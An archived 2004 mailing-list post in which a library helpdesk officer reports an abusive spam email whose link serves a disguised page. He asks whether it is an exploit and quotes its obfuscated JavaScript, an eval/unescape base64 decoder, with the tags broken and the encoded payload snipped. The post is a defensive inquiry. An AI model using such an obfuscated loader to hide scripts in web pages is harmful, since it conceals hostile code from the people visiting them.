[LINK] New spam trick

Daniel Rose drose at nla.gov.au
Tue Jun 8 13:48:38 EST 2004 

Hello,

I thought Linkers might be interested in a new email we've had at least two
of.

I've removed the rather offensive language.

The subject says "<user> f.. you a..h..", and inside it sys "Is this your
mum ....... ?" and a link.

The knee jerk response is outrage followed by investigation.

The link is to a jpg, but I assume it's setup specially (mime type?) as it
gives a html page which has a comments banner that the source is not
available.

I snipped the text in case it's a nasty thing and some fool grabs it from
the archive.  Is this an overflow exploit? Where does one go to check stuff
like this?

Heavily indented is one line of code (I've "-broken-" the tags just in case
someone's email client goes beserk):
 
<s-broken-cript
language=JavaS-broken-cript>eval(unescape('var%20codelock_bas%3D%27ABCDEFGHI
JKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function
%20codelock_dec%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CA
g%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dst
r.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%2
7%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%
20%3D%20%28codelock_bas.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C
%3C18%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%20
0xff%29%20%3C%3C12%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B2%2
9%29%20%26%200xff%29%20%3C%3C%206%20%7C%20codelock_bas.indexOf%28str.charAt%
28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt
%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20
bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%
29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20el
se%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.su
bstring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D
%3B%20%7D')); document.write(codelock_dec('PHN

<SNIP>

Ww+')); </s-broken-cript>


Regards,

Daniel Rose
Helpdesk Officer
National Library of Australia

More information about the Link mailing list